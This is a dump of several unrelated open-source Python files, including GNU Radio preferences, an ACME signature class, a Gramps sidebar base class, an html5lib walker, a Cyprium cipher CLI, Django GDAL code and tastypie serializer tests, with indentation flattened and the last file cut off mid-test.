def __init__(self, install_prefix, *args, **kwargs):
_Config.__init__(self, *args, **kwargs)
self.install_prefix = install_prefix
Constants.update_font_size(self.font_size)
@property
def editor(self):
return self.prefs.get_string('grc', 'editor', '')
@editor.setter
def editor(self, value):
        self.prefs.set_string('grc', 'editor', value)
self.prefs.save()
@property
def xterm_executable(self):
return self.prefs.get_string('grc', 'xterm_executable', 'xterm')
@property
def default_canvas_size(self):
try: # ugly, but matches current code style
raw = self.prefs.get_string('grc', 'canvas_default_size', '1280, 1024')
value = tuple(int(x.strip('() ')) for x in raw.split(','))
if len(value) != 2 or not all(300 < x < 4096 for x in value):
raise Exception()
return value
except:
print >> sys.stderr, "Error: invalid 'canvas_default_size' setting."
return Constants.DEFAULT_CANVAS_SIZE_DEFAULT
@property
def font_size(self):
try: # ugly, but matches current code style
font_size = self.prefs.get_long('grc', 'canvas_font_size',
Constants.DEFAULT_FONT_SIZE)
if font_size <= 0:
raise Exception()
except:
font_size = Constants.DEFAULT_FONT_SIZE
print >> sys.stderr, "Error: invalid 'canvas_font_size' setting."
return font_size
|
tdfischer/lets-encrypt-preview
|
refs/heads/master
|
acme/acme/other.py
|
14
|
"""Other ACME objects."""
import functools
import logging
import os
from acme import jose
logger = logging.getLogger(__name__)
class Signature(jose.JSONObjectWithFields):
"""ACME signature.
:ivar .JWASignature alg: Signature algorithm.
:ivar bytes sig: Signature.
:ivar bytes nonce: Nonce.
:ivar .JWK jwk: JWK.
"""
NONCE_SIZE = 16
"""Minimum size of nonce in bytes."""
alg = jose.Field('alg', decoder=jose.JWASignature.from_json)
sig = jose.Field('sig', encoder=jose.encode_b64jose,
decoder=jose.decode_b64jose)
nonce = jose.Field(
'nonce', encoder=jose.encode_b64jose, decoder=functools.partial(
jose.decode_b64jose, size=NONCE_SIZE, minimum=True))
jwk = jose.Field('jwk', decoder=jose.JWK.from_json)
@classmethod
def from_msg(cls, msg, key, nonce=None, nonce_size=None, alg=jose.RS256):
"""Create signature with nonce prepended to the message.
:param bytes msg: Message to be signed.
:param key: Key used for signing.
        :type key: `cryptography.hazmat.primitives.asymmetric.rsa.RSAPrivateKey`
(optionally wrapped in `.ComparableRSAKey`).
:param bytes nonce: Nonce to be used. If None, nonce of
``nonce_size`` will be randomly generated.
:param int nonce_size: Size of the automatically generated nonce.
Defaults to :const:`NONCE_SIZE`.
:param .JWASignature alg:
"""
nonce_size = cls.NONCE_SIZE if nonce_size is None else nonce_size
nonce = os.urandom(nonce_size) if nonce is None else nonce
msg_with_nonce = nonce + msg
        sig = alg.sign(key, msg_with_nonce)
logger.debug('%r signed as %r', msg_with_nonce, sig)
return cls(alg=alg, sig=sig, nonce=nonce,
jwk=alg.kty(key=key.public_key()))
def verify(self, msg):
"""Verify the signature.
:param bytes msg: Message that was used in signing.
"""
# self.alg is not Field, but JWA | pylint: disable=no-member
return self.alg.verify(self.jwk.key, self.nonce + msg, self.sig)
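# A minimal usage sketch (illustration only, not part of the module). It
# assumes an RSA private key object `key` compatible with `alg.sign`, e.g. a
# cryptography RSAPrivateKey optionally wrapped in jose.ComparableRSAKey.
#
#   signature = Signature.from_msg(b'example message', key)
#   assert signature.verify(b'example message')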
|
fillycheezstake/MissionPlanner
|
refs/heads/master
|
Lib/site-packages/numpy/distutils/tests/f2py_ext/setup.py
|
51
|
#!"C:\Users\hog\Documents\Visual Studio 2010\Projects\ArdupilotMega\ArdupilotMega\bin\Debug\ipy.exe"
def configuration(parent_package='',top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration('f2py_ext',parent_package,top_path)
config.add_extension('fib2', ['src/fib2.pyf','src/fib1.f'])
config.add_data_dir('tests')
return config
if __name__ == "__main__":
from numpy.distutils.core import setup
setup(configuration=configuration)
|
newmediamedicine/indivo_server_1_0
|
refs/heads/master
|
indivo/tests/data/reports/__init__.py
|
4
|
from allergy import TEST_ALLERGIES, TEST_ALLERGIES_INVALID
from equipment import TEST_EQUIPMENT
from immunization import TEST_IMMUNIZATIONS
from lab import TEST_LABS
from measurement import TEST_MEASUREMENTS
from medication import TEST_MEDICATIONS
from problem import TEST_PROBLEMS
from procedure import TEST_PROCEDURES
from simple_clinical_note import TEST_CLINICAL_NOTES
from vital import TEST_VITALS
TEST_REPORTS = TEST_LABS + TEST_ALLERGIES + TEST_EQUIPMENT + TEST_IMMUNIZATIONS + TEST_MEASUREMENTS + TEST_MEDICATIONS + TEST_PROBLEMS + TEST_PROCEDURES + TEST_CLINICAL_NOTES + TEST_VITALS
TEST_REPORTS_INVALID = TEST_ALLERGIES_INVALID
|
beernarrd/gramps
|
refs/heads/sl-master
|
gramps/gui/basesidebar.py
|
10
|
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2010 Nick Hall
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# BaseSidebar class
#
#-------------------------------------------------------------------------
class BaseSidebar:
"""
The base class for all sidebar plugins.
"""
def __init__(self, dbstate, uistate):
raise NotImplementedError
def get_top(self):
"""
Return the top container widget for the GUI.
"""
raise NotImplementedError
def view_changed(self, cat_num, view_num):
"""
Called when the active view is changed.
"""
raise NotImplementedError
def active(self, cat_num, view_num):
"""
Called when the sidebar is made visible.
"""
pass
def inactive(self):
"""
Called when the sidebar is hidden.
"""
pass
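# A hedged sketch of a concrete sidebar plugin (illustration only); the
# container widget factory and the plugin registration mechanism are
# assumptions, not defined by this base class.
#
#   class MySidebar(BaseSidebar):
#       def __init__(self, dbstate, uistate):
#           self.top = make_container_widget()  # e.g. a Gtk box
#       def get_top(self):
#           return self.top
#       def view_changed(self, cat_num, view_num):
#           pass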
|
zubron/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/tools/html5lib/html5lib/treewalkers/genshistream.py
|
1730
|
from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import _base
from ..constants import voidElements, namespaces
class TreeWalker(_base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, pos = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END
or next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
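# A hedged usage sketch (illustration only); it assumes a genshi markup
# stream, e.g. from genshi.input.XML, is available to walk.
#
#   from genshi.input import XML
#
#   walker = TreeWalker(XML(u"<p>hello</p>"))
#   tokens = list(walker)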
|
underloki/Cyprium
|
refs/heads/master
|
app/cli/root/crypto/text/triliteral.py
|
1
|
#! /usr/bin/python3
########################################################################
# #
# Cyprium is a multifunction cryptographic, steganographic and #
# cryptanalysis tool developped by members of The Hackademy. #
# French White Hat Hackers Community! #
# cyprium.hackademics.fr # #
# Authors: SAKAROV, mont29, afranck64 #
# Contact: [email protected] #
# Forum: hackademics.fr #
# Twitter: @hackademics_ #
# #
# Cyprium is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published #
# by the Free Software Foundation, either version 3 of the License, #
# or any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but without any warranty; without even the implied warranty of #
# merchantability or fitness for a particular purpose. See the #
# GNU General Public License for more details. #
# #
# The terms of the GNU General Public License is detailed in the #
# COPYING attached file. If not, see : http://www.gnu.org/licenses #
# #
########################################################################
import sys
import os
# In case we directly run that file, we need to add the whole cyprium to path,
# to get access to CLI stuff!
if __name__ == "__main__":
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),
"..", "..", "..", "..",
"..")))
import app.cli
import kernel.crypto.text.triliteral as triliteral
import kernel.utils as utils
class Triliteral(app.cli.Tool):
"""CLI wrapper for triliteral crypto text tool."""
def main(self, ui):
ui.message("********** Welcome to Cyprium.Triliteral! **********")
quit = False
while not quit:
options = [(self.about, "*about", "Show some help!"),
(self.demo, "*demo", "Show some examples"),
(self.cypher, "*cypher",
"Cypher some text in triliteral"),
(self.decypher, "d*ecypher",
"Decypher triliteral into text"),
("", "-----", ""),
("tree", "*tree", "Show the whole tree"),
("quit", "*quit", "Quit Cyprium.Triliteral")]
msg = "Cyprium.Biliteral"
answ = ui.get_choice(msg, options)
if answ == 'tree':
self._tree.print_tree(ui, self._tree.FULL)
elif answ == 'quit':
self._tree.current = self._tree.current.parent
quit = True
else:
answ(ui)
ui.message("Back to Cyprium menus! Bye.")
def about(self, ui):
ui.message(triliteral.__about__)
ui.get_choice("", [("", "Go back to $menu", "")], oneline=True)
def demo(self, ui):
ui.message("===== Demo Mode =====")
ui.message("Running a small demo/testing!")
ui.message("")
ui.message("--- Cyphering ---")
text = "snoworrain"
ui.message("Data to cypher: {}".format(text))
out = triliteral.cypher(text)
ui.message("Triliteral cyphered data: {}".format(out))
ui.message("")
ui.message("--- Decyphering ---")
htext = "CBAACCCAAACCCABCABACBABBACBAAAAACBABAAAABAABBBBACCAABABBC" \
"CABABCBCC"
ui.message("Triliteral text used as input: {}".format(htext))
out = triliteral.decypher(htext)
ui.message("The decyphered data is: {}".format(out))
ui.message("")
ui.message("--- Note ---")
ui.message("+ You can select another base than the default one "
"(1, 'a' -> AAA). E.g. with a base 13:")
text = "trytocypherthis"
ui.message("Data to cypher: {}".format(text))
out = triliteral.cypher(text, 13)
ui.message("Triliteral base 13 cyphered data: {}".format(out))
out = triliteral.decypher(out, 13)
ui.message("The base 13 decyphered data is: {}".format(out))
ui.message("")
ui.message("--- Won’t work ---")
ui.message("+ The input text to cypher must be ASCII lowercase "
"chars only:")
ui.message("Data to cypher: {}\n".format("Hello World !"))
try:
out = triliteral.cypher("Hello World !")
ui.message("Triliteral cyphered data: {}"
"".format(out))
except Exception as e:
ui.message(str(e), level=ui.ERROR)
ui.message("")
ui.message("+ The input text to decypher must be valid Triliteral:")
htext = "AABCBBBAABABCCCCBBAACABACABCBAABACBAAAACCABABCCBACB"
ui.message("Triliteral text used as input: {}".format(htext))
try:
out = triliteral.decypher(htext)
ui.message("Triliteral decyphered data: {}"
"".format(out))
except Exception as e:
ui.message(str(e), level=ui.ERROR)
ui.message("")
ui.get_choice("", [("", "Go back to $menu", "")], oneline=True)
def cypher(self, ui):
"""Interactive version of cypher()."""
txt = ""
ui.message("===== Cypher Mode =====")
while 1:
done = False
while 1:
base = 1
txt = ui.text_input("Text to cypher to Triliteral",
sub_type=ui.LOWER)
if txt is None:
break # Go back to main Cypher menu.
t = ui.get_data("Cypher base (nothing to use default "
"{} one): ".format(base),
sub_type=ui.INT, allow_void=True)
if t is not None:
base = t
try:
# Will also raise an exception if data is None.
txt = triliteral.cypher(txt, base)
done = True # Out of those loops, output result.
break
except Exception as e:
if utils.DEBUG:
import traceback
traceback.print_tb(sys.exc_info()[2])
ui.message(str(e), level=ui.ERROR)
options = [("retry", "*try again", ""),
("menu", "or go back to *menu", "")]
answ = ui.get_choice("Could not convert that data into "
"Biliteral, please", options,
oneline=True)
if answ in {None, "menu"}:
                        return # Go back to main Triliteral menu.
# Else, retry with another data to hide.
if done:
ui.text_output("Text successfully converted", txt,
"Triliteral base {} version of text"
"".format(base))
options = [("redo", "*cypher another text", ""),
("quit", "or go back to *menu", "")]
answ = ui.get_choice("Do you want to", options, oneline=True)
if answ in {None, "quit"}:
return
def decypher(self, ui):
"""Interactive version of decypher()."""
txt = ""
ui.message("===== Decypher Mode =====")
while 1:
base = 1
txt = ui.text_input("Please choose some Triliteral text",
sub_type=ui.UPPER)
t = ui.get_data("Decypher base (nothing to use default "
"{} one): ".format(base),
sub_type=ui.INT, allow_void=True)
if t is not None:
base = t
try:
ui.text_output("Text successfully decyphered",
triliteral.decypher(txt, base),
"The base {} decyphered text is"
"".format(base))
except Exception as e:
if utils.DEBUG:
import traceback
traceback.print_tb(sys.exc_info()[2])
ui.message(str(e), level=ui.ERROR)
options = [("redo", "*decypher another data", ""),
("quit", "or go back to *menu", "")]
answ = ui.get_choice("Do you want to", options, oneline=True)
if answ == "quit":
return
NAME = "triliteral"
TIP = "Tool to convert text to/from triliteral code."
TYPE = app.cli.Node.TOOL
CLASS = Triliteral
# Allow tool to be used directly, without using Cyprium menu.
if __name__ == "__main__":
import app.cli.ui
ui = app.cli.ui.UI()
tree = app.cli.NoTree("Triliteral")
Triliteral(tree).main(ui)
|
ZhaoCJ/django
|
refs/heads/master
|
django/contrib/gis/gdal/datasource.py
|
219
|
"""
DataSource is a wrapper for the OGR Data Source object, which provides
an interface for reading vector geometry data from many different file
formats (including ESRI shapefiles).
When instantiating a DataSource object, use the filename of a
GDAL-supported data source. For example, a SHP file or a
TIGER/Line file from the government.
The ds_driver keyword is used internally when a ctypes pointer
is passed in directly.
Example:
ds = DataSource('/home/foo/bar.shp')
for layer in ds:
for feature in layer:
# Getting the geometry for the feature.
g = feature.geom
# Getting the 'description' field for the feature.
desc = feature['description']
# We can also increment through all of the fields
# attached to this feature.
for field in feature:
# Get the name of the field (e.g. 'description')
nm = field.name
# Get the type (integer) of the field, e.g. 0 => OFTInteger
t = field.type
# Returns the value the field; OFTIntegers return ints,
# OFTReal returns floats, all else returns string.
val = field.value
"""
# ctypes prerequisites.
from ctypes import byref
# The GDAL C library, OGR exceptions, and the Layer object.
from django.contrib.gis.gdal.base import GDALBase
from django.contrib.gis.gdal.driver import Driver
from django.contrib.gis.gdal.error import OGRException, OGRIndexError
from django.contrib.gis.gdal.layer import Layer
# Getting the ctypes prototypes for the DataSource.
from django.contrib.gis.gdal.prototypes import ds as capi
from django.utils.encoding import force_bytes, force_text
from django.utils import six
from django.utils.six.moves import xrange
# For more information, see the OGR C API source code:
# http://www.gdal.org/ogr/ogr__api_8h.html
#
# The OGR_DS_* routines are relevant here.
class DataSource(GDALBase):
"Wraps an OGR Data Source object."
#### Python 'magic' routines ####
def __init__(self, ds_input, ds_driver=False, write=False, encoding='utf-8'):
# The write flag.
if write:
self._write = 1
else:
self._write = 0
# See also http://trac.osgeo.org/gdal/wiki/rfc23_ogr_unicode
self.encoding = encoding
# Registering all the drivers, this needs to be done
# _before_ we try to open up a data source.
if not capi.get_driver_count():
capi.register_all()
if isinstance(ds_input, six.string_types):
# The data source driver is a void pointer.
ds_driver = Driver.ptr_type()
try:
# OGROpen will auto-detect the data source type.
ds = capi.open_ds(force_bytes(ds_input), self._write, byref(ds_driver))
except OGRException:
# Making the error message more clear rather than something
# like "Invalid pointer returned from OGROpen".
raise OGRException('Could not open the datasource at "%s"' % ds_input)
elif isinstance(ds_input, self.ptr_type) and isinstance(ds_driver, Driver.ptr_type):
ds = ds_input
else:
raise OGRException('Invalid data source input type: %s' % type(ds_input))
if bool(ds):
self.ptr = ds
self.driver = Driver(ds_driver)
else:
# Raise an exception if the returned pointer is NULL
raise OGRException('Invalid data source file "%s"' % ds_input)
def __del__(self):
"Destroys this DataStructure object."
if self._ptr: capi.destroy_ds(self._ptr)
def __iter__(self):
"Allows for iteration over the layers in a data source."
for i in xrange(self.layer_count):
yield self[i]
def __getitem__(self, index):
"Allows use of the index [] operator to get a layer at the index."
if isinstance(index, six.string_types):
l = capi.get_layer_by_name(self.ptr, force_bytes(index))
if not l: raise OGRIndexError('invalid OGR Layer name given: "%s"' % index)
elif isinstance(index, int):
if index < 0 or index >= self.layer_count:
raise OGRIndexError('index out of range')
l = capi.get_layer(self._ptr, index)
else:
raise TypeError('Invalid index type: %s' % type(index))
return Layer(l, self)
def __len__(self):
"Returns the number of layers within the data source."
return self.layer_count
def __str__(self):
"Returns OGR GetName and Driver for the Data Source."
return '%s (%s)' % (self.name, str(self.driver))
@property
def layer_count(self):
"Returns the number of layers in the data source."
return capi.get_layer_count(self._ptr)
@property
def name(self):
"Returns the name of the data source."
name = capi.get_ds_name(self._ptr)
return force_text(name, self.encoding, strings_only=True)
|
loftywaif002/django-tastypie
|
refs/heads/master
|
tests/core/tests/serializers.py
|
20
|
# -*- coding: utf-8 -*-
import datetime
import yaml
from decimal import Decimal
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from tastypie.bundle import Bundle
from tastypie import fields
from tastypie.exceptions import BadRequest
from tastypie.serializers import Serializer
from tastypie.resources import ModelResource
from core.models import Note
try:
import biplist
except ImportError:
biplist = None
class UnsafeObject(object):
pass
class NoteResource(ModelResource):
class Meta:
resource_name = 'notes'
queryset = Note.objects.filter(is_active=True)
class AnotherNoteResource(ModelResource):
aliases = fields.ListField(attribute='aliases', null=True)
meta = fields.DictField(attribute='metadata', null=True)
owed = fields.DecimalField(attribute='money_owed', null=True)
class Meta:
resource_name = 'anothernotes'
queryset = Note.objects.filter(is_active=True)
def dehydrate(self, bundle):
bundle.data['aliases'] = ['Mr. Smith', 'John Doe']
bundle.data['meta'] = {'threat': 'high'}
bundle.data['owed'] = Decimal('102.57')
return bundle
class SerializerTestCase(TestCase):
def test_init(self):
serializer_1 = Serializer()
self.assertEqual(serializer_1.formats, ['json', 'xml', 'yaml', 'html', 'plist'])
self.assertEqual(serializer_1.content_types, {'xml': 'application/xml', 'yaml': 'text/yaml', 'json': 'application/json', 'jsonp': 'text/javascript', 'html': 'text/html', 'plist': 'application/x-plist'})
self.assertEqual(serializer_1.supported_formats, ['application/json', 'application/xml', 'text/yaml', 'text/html', 'application/x-plist'])
serializer_2 = Serializer(formats=['json', 'xml'])
self.assertEqual(serializer_2.formats, ['json', 'xml'])
self.assertEqual(serializer_2.content_types, {'xml': 'application/xml', 'yaml': 'text/yaml', 'json': 'application/json', 'jsonp': 'text/javascript', 'html': 'text/html', 'plist': 'application/x-plist'})
self.assertEqual(serializer_2.supported_formats, ['application/json', 'application/xml'])
serializer_3 = Serializer(formats=['json', 'xml'], content_types={'json': 'text/json', 'xml': 'application/xml'})
self.assertEqual(serializer_3.formats, ['json', 'xml'])
self.assertEqual(serializer_3.content_types, {'xml': 'application/xml', 'json': 'text/json'})
self.assertEqual(serializer_3.supported_formats, ['text/json', 'application/xml'])
serializer_4 = Serializer(formats=['plist', 'json'], content_types={'plist': 'application/x-plist', 'json': 'application/json'})
self.assertEqual(serializer_4.formats, ['plist', 'json'])
self.assertEqual(serializer_4.content_types, {'plist': 'application/x-plist', 'json': 'application/json'})
self.assertEqual(serializer_4.supported_formats, ['application/x-plist', 'application/json'])
self.assertRaises(ImproperlyConfigured, Serializer, formats=['json', 'xml'], content_types={'json': 'text/json'})
def test_default_formats_setting(self):
# When we drop support for Django 1.3 this boilerplate can be replaced with
# a simple django.test.utils.override_settings decorator:
old_formats = getattr(settings, 'TASTYPIE_DEFAULT_FORMATS', None)
try:
# Confirm that the setting will override the default values:
settings.TASTYPIE_DEFAULT_FORMATS = ('json', 'xml')
s = Serializer()
self.assertEqual(list(s.formats), ['json', 'xml'])
self.assertEqual(list(s.supported_formats), ['application/json', 'application/xml'])
self.assertEqual(s.content_types, {'xml': 'application/xml', 'yaml': 'text/yaml', 'json': 'application/json', 'jsonp': 'text/javascript', 'html': 'text/html', 'plist': 'application/x-plist'})
            # Confirm that subclasses which set their own formats list won't be overridden:
class JSONSerializer(Serializer):
formats = ['json']
js = JSONSerializer()
self.assertEqual(list(js.formats), ['json'])
self.assertEqual(list(js.supported_formats), ['application/json'])
finally:
if old_formats is None:
del settings.TASTYPIE_DEFAULT_FORMATS
else:
settings.TASTYPIE_DEFAULT_FORMATS = old_formats
def get_sample1(self):
return {
'name': 'Daniel',
'age': 27,
'date_joined': datetime.date(2010, 3, 27),
'snowman': u'☃',
}
def get_sample2(self):
return {
'somelist': ['hello', 1, None],
'somehash': {'pi': 3.14, 'foo': 'bar'},
'somestring': 'hello',
'true': True,
'false': False,
}
def test_format_datetime(self):
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
serializer = Serializer(datetime_formatting='iso-8601')
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
serializer = Serializer(datetime_formatting='iso-8601-strict')
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33, 10)), '2010-12-16T02:31:33')
serializer = Serializer(datetime_formatting='rfc-2822')
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), u'Thu, 16 Dec 2010 02:31:33 -0600')
serializer = Serializer(datetime_formatting='random-garbage')
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
# Stow.
old_format = getattr(settings, 'TASTYPIE_DATETIME_FORMATTING', 'iso-8601')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601'
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601-strict'
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33, 10)), '2010-12-16T02:31:33')
settings.TASTYPIE_DATETIME_FORMATTING = 'rfc-2822'
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), u'Thu, 16 Dec 2010 02:31:33 -0600')
settings.TASTYPIE_DATETIME_FORMATTING = 'random-garbage'
serializer = Serializer()
self.assertEqual(serializer.format_datetime(datetime.datetime(2010, 12, 16, 2, 31, 33)), '2010-12-16T02:31:33')
# Restore.
settings.TASTYPIE_DATETIME_FORMATTING = old_format
def test_format_date(self):
serializer = Serializer()
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
serializer = Serializer(datetime_formatting='iso-8601')
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
serializer = Serializer(datetime_formatting='rfc-2822')
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), u'16 Dec 2010')
serializer = Serializer(datetime_formatting='random-garbage')
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
# Stow.
old_format = getattr(settings, 'TASTYPIE_DATETIME_FORMATTING', 'iso-8601')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601'
serializer = Serializer()
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
settings.TASTYPIE_DATETIME_FORMATTING = 'rfc-2822'
serializer = Serializer()
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), u'16 Dec 2010')
settings.TASTYPIE_DATETIME_FORMATTING = 'random-garbage'
serializer = Serializer()
self.assertEqual(serializer.format_date(datetime.date(2010, 12, 16)), '2010-12-16')
# Restore.
settings.TASTYPIE_DATETIME_FORMATTING = old_format
def test_format_time(self):
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
serializer = Serializer(datetime_formatting='iso-8601')
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
serializer = Serializer(datetime_formatting='iso-8601-strict')
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33, 10)), '02:31:33')
serializer = Serializer(datetime_formatting='rfc-2822')
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), u'02:31:33 -0600')
serializer = Serializer(datetime_formatting='random-garbage')
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
# Stow.
old_format = getattr(settings, 'TASTYPIE_DATETIME_FORMATTING', 'iso-8601')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601'
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
settings.TASTYPIE_DATETIME_FORMATTING = 'iso-8601-strict'
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33, 10)), '02:31:33')
settings.TASTYPIE_DATETIME_FORMATTING = 'rfc-2822'
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), u'02:31:33 -0600')
settings.TASTYPIE_DATETIME_FORMATTING = 'random-garbage'
serializer = Serializer()
self.assertEqual(serializer.format_time(datetime.time(2, 31, 33)), '02:31:33')
# Restore.
settings.TASTYPIE_DATETIME_FORMATTING = old_format
def test_to_xml(self):
serializer = Serializer()
sample_1 = self.get_sample1()
# This needs a little explanation.
# From http://lxml.de/parsing.html, what comes out of ``tostring``
# (despite encoding as UTF-8) is a bytestring. This is because that's
# what other libraries expect (& will do the decode). We decode here
# so we can make extra special sure it looks right.
binary_xml = serializer.to_xml(sample_1)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, u'<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<response><age type="integer">27</age><date_joined>2010-03-27</date_joined><name>Daniel</name><snowman>☃</snowman></response>')
def test_to_xml2(self):
serializer = Serializer()
sample_2 = self.get_sample2()
binary_xml = serializer.to_xml(sample_2)
unicode_xml = binary_xml.decode('utf-8')
self.assertEqual(unicode_xml, '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<response><false type="boolean">False</false><somehash type="hash"><foo>bar</foo><pi type="float">3.14</pi></somehash><somelist type="list"><value>hello</value><value type="integer">1</value><value type="null"/></somelist><somestring>hello</somestring><true type="boolean">True</true></response>')
def test_from_xml(self):
serializer = Serializer()
data = u'<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<request><snowman>☃</snowman><age type="integer">27</age><name>Daniel</name><date_joined>2010-03-27</date_joined><rocksdahouse type="boolean">True</rocksdahouse></request>'
self.assertEqual(serializer.from_xml(data), {'rocksdahouse': True, 'age': 27, 'name': 'Daniel', 'date_joined': '2010-03-27', 'snowman': u'☃'})
def test_from_xml2(self):
serializer = Serializer()
data = '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<request><somelist type="list"><value>hello</value><value type="integer">1</value><value type="null"/></somelist><somehash type="hash"><pi type="float">3.14</pi><foo>bar</foo></somehash><false type="boolean">False</false><true type="boolean">True</true><somestring>hello</somestring></request>'
self.assertEqual(serializer.from_xml(data), self.get_sample2())
def test_malformed_xml(self):
serializer = Serializer()
data = '<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<request><somelist type="list"><valueNO CARRIER'
self.assertRaises(BadRequest, serializer.from_xml, data)
def test_to_json(self):
serializer = Serializer()
sample_1 = self.get_sample1()
self.assertEqual(serializer.to_json(sample_1), u'{"age": 27, "date_joined": "2010-03-27", "name": "Daniel", "snowman": "☃"}')
def test_from_json(self):
serializer = Serializer()
sample_1 = serializer.from_json(u'{"age": 27, "date_joined": "2010-03-27", "name": "Daniel", "snowman": "☃"}')
self.assertEqual(len(sample_1), 4)
self.assertEqual(sample_1['name'], 'Daniel')
self.assertEqual(sample_1['age'], 27)
self.assertEqual(sample_1['date_joined'], u'2010-03-27')
self.assertEqual(sample_1['snowman'], u'☃')
def test_from_broken_json(self):
serializer = Serializer()
data = '{"foo": "bar",NO CARRIER'
self.assertRaises(BadRequest, serializer.from_json, data)
def test_round_trip_xml(self):
serializer = Serializer()
sample_data = self.get_sample2()
serialized = serializer.to_xml(sample_data)
# "response" tags need to be changed to "request" to deserialize properly.
# A string substitution works here.
serialized = serialized.decode('utf-8').replace('response', 'request')
unserialized = serializer.from_xml(serialized)
self.assertEqual(sample_data, unserialized)
def test_round_trip_json(self):
serializer = Serializer()
sample_data = self.get_sample2()
serialized = serializer.to_json(sample_data)
unserialized = serializer.from_json(serialized)
self.assertEqual(sample_data, unserialized)
def test_round_trip_yaml(self):
serializer = Serializer()
sample_data = self.get_sample2()
serialized = serializer.to_yaml(sample_data)
unserialized = serializer.from_yaml(serialized)
self.assertEqual(sample_data, unserialized)
def test_unsafe_yaml(self):
serializer = Serializer()
evil_data = UnsafeObject()
serialized = yaml.dump(evil_data)
self.assertRaises(yaml.constructor.ConstructorError,
serializer.from_yaml,
serialized)
def test_unsafe_xml(self):
"""
Entity expansion can be used to cause large memory usage after
deserialization for little memory usage from the attacker.
See https://pypi.python.org/pypi/defusedxml for more information.
"""
serializer = Serializer()
data = """<!DOCTYPE bomb [<!ENTITY a "evil chars">]>
<bomb>&a;</bomb>
"""
self.assertRaises(BadRequest, serializer.from_xml, data)
def test_to_jsonp(self):
serializer = Serializer()
sample_1 = self.get_sample1()
options = {'callback': 'myCallback'}
serialized = serializer.to_jsonp(sample_1, options=options)
serialized_json = serializer.to_json(sample_1)
self.assertEqual('myCallback(%s)' % serialized_json,
serialized)
def test_invalid_jsonp_characters(self):
"""
The newline characters \u2028 and \u2029 need to be escaped
in JSONP.
"""
